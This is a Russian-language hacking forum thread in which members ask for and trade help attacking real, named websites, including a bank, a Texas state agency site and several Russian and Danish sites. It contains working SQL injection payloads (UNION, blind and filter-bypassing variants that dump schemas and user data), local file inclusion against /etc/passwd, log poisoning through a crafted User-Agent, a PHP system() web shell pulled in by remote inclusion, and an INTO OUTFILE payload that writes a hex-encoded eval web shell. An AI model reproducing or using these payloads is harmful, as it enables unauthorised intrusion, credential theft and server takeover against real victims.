Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. immortal_Ale

    immortal_Ale New Member

    Joined:
    17 Jun 2011
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Подскажите как узнать таблицы с колонками в MySQL 4.0.x ? всю ночь парился и не фига,просто сайт банка нашел с sql
     
  2. ZARO

    ZARO Elder - Старейшина

    Joined:
    17 Apr 2009
    Messages:
    327
    Likes Received:
    129
    Reputations:
    54
    Колонки можно узнать, если есть вывод об ошибках, и есть имя таблицы у которой нужно узнать колонки. А таблицы никак не узнать, только брутом. Проверить, есть ли права на счему mysql, потом file_priv. Если есть права, то можно будет через into outfile попробовать залить, а если file_priv=N то можно будет хэши mysql юзеров вытащить и потом попытаться phpMyAdmin найти, чтобы авторизоваться

    Как я знаю, PUT, DELETE, OPTIONS ничего полезного не дадут. Иногда бывает в .htaccess <Limit GET > т.е. Post запросы будут проходить.
     
    #18062 ZARO, 18 Oct 2011
    Last edited: 18 Oct 2011
  3. Kuteke

    Kuteke Banned

    Joined:
    26 Jun 2010
    Messages:
    179
    Likes Received:
    26
    Reputations:
    6
    http://ts.cityvibe[nogoogle].com/escorts.php?country=1[inj]&do=cityview
    ORA-xxxx пишет. Значит Oracle? Раскрутите пожалуйста.
     
  4. JustPauL

    JustPauL New Member

    Joined:
    1 Sep 2011
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Вопрос по phpmyadmin: Есть уязвимый для LFI сайт _www.someurl.com/phpmyadmin/css/phpmyadmin.css.php?GLOBALS[cfg][ThemePath]=/etc&theme=passwd%00
    Долго пытался найти логи apach, но так и не смог, proc/self/environ тоже не доступен для чтения. Есть ли какие-нибудь другие способы залить шелл?
     
  5. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    есть такой вопрос
    http://xchats.ru/forum/xf.php?s=0&ci=1&id=0&pass=&mod=show&rid=1&page=0%27

    смогу ли я влепить сюда свой запрос если уязвимый гет параметр передаётся в лимит? если да то как?
     
  6. Boolean

    Boolean Elder - Старейшина

    Joined:
    5 Sep 2010
    Messages:
    147
    Likes Received:
    83
    Reputations:
    78
    Там нет инъекции.

    Просто кривые руки.
    В коде бы выглядело как-то так:
    PHP:
    "... LIMIT " . (($_GET['page']-1)*10) . ", 10 .. "
     
    1 person likes this.
  7. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Вот крутил как слепую, никак до ума довести не могу как выдрать логины.

    Мож у Вас что получится ?

    Code:
    http://www.agd.state.tx.us/36id/storyquery.asp?ID=41+and+(select+count(user_name)+from+stories)=18+and+1=1

    Забыл сказать, то что выше - это MsAccess
     
    _________________________
    #18067 BigBear, 19 Oct 2011
    Last edited: 19 Oct 2011
  8. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    943
    Likes Received:
    525
    Reputations:
    173
    Всем привет, дайте подсказку с Smf форумом, нету прав на запись в папку тем, как залить шелл?
     
  9. Boolean

    Boolean Elder - Старейшина

    Joined:
    5 Sep 2010
    Messages:
    147
    Likes Received:
    83
    Reputations:
    78
    http://www.agd.state.tx.us/36id/storyquery.asp?ID=41)and(1=2)union(select(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12)from(stories)
     
    3 people like this.
  10. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    393
    Likes Received:
    40
    Reputations:
    23
    Как ты подобрал количество полей здесь, объясни если не трудно?
     
  11. Boolean

    Boolean Elder - Старейшина

    Joined:
    5 Sep 2010
    Messages:
    147
    Likes Received:
    83
    Reputations:
    78
    Code:
    http://www.agd.state.tx.us/36id/storyquery.asp?ID=41)+order+by+(10
    Нет ошибки.
    
    http://www.agd.state.tx.us/36id/storyquery.asp?ID=41)+order+by+(20
    Есть ошибка.
    
    http://www.agd.state.tx.us/36id/storyquery.asp?ID=41)+order+by+(15
    Есть ошибка.
    
    http://www.agd.state.tx.us/36id/storyquery.asp?ID=41)+order+by+(13
    Есть ошибка.
    
    http://www.agd.state.tx.us/36id/storyquery.asp?ID=41)+order+by+(12
    Нет ошибки.
    
     
  12. smirk

    smirk Elder - Старейшина

    Joined:
    8 Sep 2011
    Messages:
    137
    Likes Received:
    43
    Reputations:
    26
    хм..
    а как такое обойти?
    http://www.soldatru.ru/read.php?id=-1410+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14+--+
     
  13. =Zeus=

    =Zeus= Member

    Joined:
    10 Aug 2009
    Messages:
    213
    Likes Received:
    54
    Reputations:
    5
    Добрый вечер. Интересует, что можно сделать с этим сайтом. Проблема в том что я нашел лишь одну php-страничку. Даже кавычку подставить некуда. Не понятно так же, что за движок (походу самописный). Сканил структуру сайта меднет-сканнером - тоже ничего интересного.
    Все что я смог это получить раскрытие путей, подпортив кукисы.
    Буду благодарен за любую инфу, которая может помочь.
     
    #18073 =Zeus=, 20 Oct 2011
    Last edited: 21 Oct 2011
  14. Boolean

    Boolean Elder - Старейшина

    Joined:
    5 Sep 2010
    Messages:
    147
    Likes Received:
    83
    Reputations:
    78
    Можно побаловаться с IF(), но нормально ничего не вытащишь.
    http://www.soldatru.ru/read.php?id=IF((SUBSTR(version(),1,1)='5'),1410,-1410)

    Если правильно - покажет страницу, нет - не покажет.

    регулярка на select, пробовал SeLeCT и т.п. вариации с регистром букв, не помогает.
     
  15. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    393
    Likes Received:
    40
    Reputations:
    23
    Так, но вывода все равно нет

    http://www.soldatru.ru/read.php?id=-1410+%75%6e%69%6f%6e%0a%73%65%6c%65%63%74+1,2,3,4,5,6,7,8,9,10,11,12,13,14+--+
     
    #18075 er9j6@, 20 Oct 2011
    Last edited: 20 Oct 2011
  16. Boolean

    Boolean Elder - Старейшина

    Joined:
    5 Sep 2010
    Messages:
    147
    Likes Received:
    83
    Reputations:
    78
    В прочем, там и в поиске уязвимость вида SQL INJ.

    Пробелы стр_реплейсятся на %, видимо для "улучшения" результатов поиска.

    Вместо пробела юзать /**/

    В поиск:
    http://www.soldatru.ru/search.php
    '/**/and/**/1=2/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,user(),version()),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/**/#
     
    1 person likes this.
  17. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    393
    Likes Received:
    40
    Reputations:
    23
    это вбей в search.php

    'and/**/1=0/**/union/**/select/**/1,2,3,4,5,6,7,8,(select(@x)from(select(@x:=0x00),(select(null)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#
     
  18. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    393
    Likes Received:
    40
    Reputations:
    23
    Как на сайте посмотреть содержимое директории?

    http://www.enu.dk/index.php?index=http://site.com/shell.php?c=ls%20-al

    <?php

    print(system($_GET['c']));

    ?>

    команда не выполняется
    allow_url_fopen - on
    http://www.enu.dk/index.php?index=../phpinfo.php
     
  19. Boolean

    Boolean Elder - Старейшина

    Joined:
    5 Sep 2010
    Messages:
    147
    Likes Received:
    83
    Reputations:
    78
    Code:
    include(includes/
    
    Facepalm.

    Это LFI, а не RFI. Local File Include.

    http://www.enu.dk/index.php?index=../../../../etc/passwd

    Дальше либо чекай /proc/self/environ/
    /proc/self/fd/2 (вообще от 1 до 7)

    Или ищи access логи. И заходи на страницу с юзерагентом по типу <?php phpinfo(); ?>

    В курле параметр -H
    -H "User-Agent: <?php phpinfo();exit(); ?>"
     
  20. z0mbie86

    z0mbie86 Active Member

    Joined:
    25 Jul 2009
    Messages:
    38
    Likes Received:
    126
    Reputations:
    0
    Что неправильно делаю? file_priv=y

    Code:
    http://wifi.hm-ugratel.ru/?m[admin]&id=',''and(select(1)from(select(count(*)),(concat((select(0x2533433F7068702532306576616C28245F524551554553545B636D645D293B25)/**/from/**/fontan.mp_gw_auth/**/into/**/outfile/**/0x2F7372762F7777772F76686F7374732F7567726174656C2E72752F7368656C6C),0x00,floor(rand(0)*2)))x/**/from(information_schema.tables)group/**/by(x))a)and'
     
Thread Status:
Not open for further replies.